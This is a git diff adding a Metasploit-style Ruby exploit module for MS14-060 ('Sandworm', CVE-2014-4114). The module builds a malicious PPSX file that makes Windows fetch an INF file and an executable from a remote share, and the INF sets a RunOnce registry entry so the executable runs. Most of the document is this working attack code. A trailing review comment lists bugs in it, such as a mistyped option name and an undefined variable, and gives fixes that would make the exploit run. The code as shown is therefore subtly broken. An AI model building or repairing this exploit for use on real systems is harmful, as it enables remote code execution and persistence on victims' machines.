diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
new file mode 100644
index 0000000000..cf8f911c15
--- /dev/null
+++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::EXE
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
+ 'Description' => %q{
+ This module exploits a vulnerability Microsoft Windows from Vista SP2 to Windows 8,
+ including Windows Server 2008 and 2012. The vulnerability exists in the OLE package
+ magager, which allows to download and execute remote INF files silently. This module
+ triggers the vulnerability through a malicious PPSX file, as exploited in the wild on
+ October 2014.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Eduardo Prado', # Vulnerability discovery
+ 'sinn3r', # Metasploit module
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-4114'],
+ ['OSVDB', '113140'],
+ ['MSB', 'MS14-060'],
+ ['BID', '70419'],
+ ['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],
+ ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'],
+ ['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/']
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2048,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Targets' =>
+ [
+ ['Windows 7 SP1 / Office 2010 SP1', {}],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Oct 14 2014",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
+ OptString.new('UNCPATH', [ true, 'The UNC path to use (Ex: \\\\192.168.1.1\\share)', '\\\\172.16.158.1\\public' ])
+ ], self.class)
+ end
+
+ def exploit
+ @unc = 
validate_unc
+
+ if @unc.nil?
+ fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
+ end
+
+ print_status("Creating the EXE payload...")
+ payload_name = "#{rand_text_alpha(4)}.gif"
+ p = generate_payload_exe
+
+ print_status("Creating the INF file...")
+ inf_name = "#{rand_text_alpha(4)}.inf"
+ inf = inf_file(payload_name)
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ exe_stream = ole_exe(payload_name)
+ inf_stream = ole_inf(inf_name)
+ zip = zip_ppsx(exe_stream, inf_stream)
+ file_create(zip)
+
+ payload_path = my_file_create(p, payload_name)
+ print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")
+
+ inf_path = my_file_create(inf, inf_name)
+ print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
+ end
+
+ def validate_unc
+ if datastore['UNCPATH'] =~ /\\\\([^\\]+)\\([^\\]+)/
+ unc = datastore['UNPATH']
+ else
+ unc = nil
+ end
+
+ unc
+ end
+
+ def my_file_create(data, name)
+ ltype = "exploit.fileformat.#{self.shortname}"
+ path = store_local(ltype, nil, data, name)
+
+ path
+ end
+
+ def zip_ppsx(ole_exe, ole_inf)
+ zip_data = {}
+ data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
+
+ Dir["#{data_dir}/**/**"].each do |file|
+ unless File.directory?(file)
+ zip_data[file.sub(data_dir,'')] = File.read(file)
+ end
+ end
+
+ #add the otherwise skipped "hidden" file
+ file = "#{data_dir}/_rels/.rels"
+ zip_data[file.sub(data_dir,'')] = File.read(file)
+
+ #put our own OLE streams
+ zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
+ zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf
+
+ #and lets create the file
+ ppsx = Rex::Zip::Archive.new
+ zip_data.each_pair do |k,v|
+ ppsx.add_file(k,v)
+ end
+
+ ppsx.pack
+ end
+
+ def ole_inf(file_name)
+ content = "EmbeddedStg2.txt\x00"
+ content << "#{@unc}\\#{file_name}\x00"
+
+ data = [content.length].pack('V')
+ data << content
+ ole = 
create_ole("\x01OLE10Native", data)
+
+ ole
+ end
+
+ def ole_exe(file_name)
+ content = "EmbeddedStg1.txt\x00"
+ content << "#{@unc}\\#{file_name}\x00"
+
+ data = [content.length].pack('V')
+ data << content
+
+ ole = create_ole("\x01OLE10Native", data)
+
+ ole
+ end
+
+ def create_ole(stream_name, data)
+ ole_tmp = Rex::Quickfile.new('ole')
+ stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
+
+ stm = stg.create_stream(stream_name)
+ stm << data
+ stm.close
+
+ directory.each_entry do |entry|
+ if entry.instance_variable_get(:@_ab) == 'Root Entry'
+ # 02260200-0000-0000-c000-000000000046 # Video clip
+ clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
+ entry.instance_variable_set(:@_clsId, clsid)
+ end
+ end
+
+ # write to disk
+ stg.close
+
+ ole_contents = File.read(ole_tmp.path)
+ ole_tmp.close
+ ole_tmp.unlink
+
+ ole_contents
+ end
+
+ def inf_file(gif_name)
+ inf = <<-EOF
+; 61883.INF
+; Copyright (c) Microsoft Corporation. All rights reserved.
+
+[Version]
+Signature = "$CHICAGO$"
+Class=61883
+ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
+Provider=%Msft%
+DriverVer=06/21/2006,6.1.7600.16385
+
+[DestinationDirs]
+DefaultDestDir = 1
+
+[DefaultInstall]
+RenFiles = RxRename
+AddReg = RxStart
+
+[RxRename]
+#{gif_name}.exe, #{gif_name}
+[RxStart]#
+HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
+EOF
+
+ inf
+ end
+
+end
+
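Review bot: `validate_unc` matches `datastore['UNCPATH']` but then assigns `unc = datastore['UNPATH']`, a key that is never registered, so it returns nil for every valid input and `exploit` always stops at the BadConfig `fail_with`; the assignment should be `unc = datastore['UNCPATH']` (or `Regexp.last_match(0)` to keep only the matched share). The pattern is also unanchored, so a value with leading or trailing junk passes validation and is copied verbatim into both OLE streams and the printed instructions; `/\A\\\\[^\\]+\\[^\\]+\z/` would reject it. In `create_ole`, `directory` is never assigned before `directory.each_entry`, so unless a mixin supplies that name this raises NameError at runtime — it appears to belong to `stg` (confirm against Rex::OLE::Storage's API). The 4-byte length prefix in `ole_inf`/`ole_exe` uses `content.length` (characters) where the stream needs a byte count; `content.bytesize` is the safer choice if UNCPATH can ever contain non-ASCII.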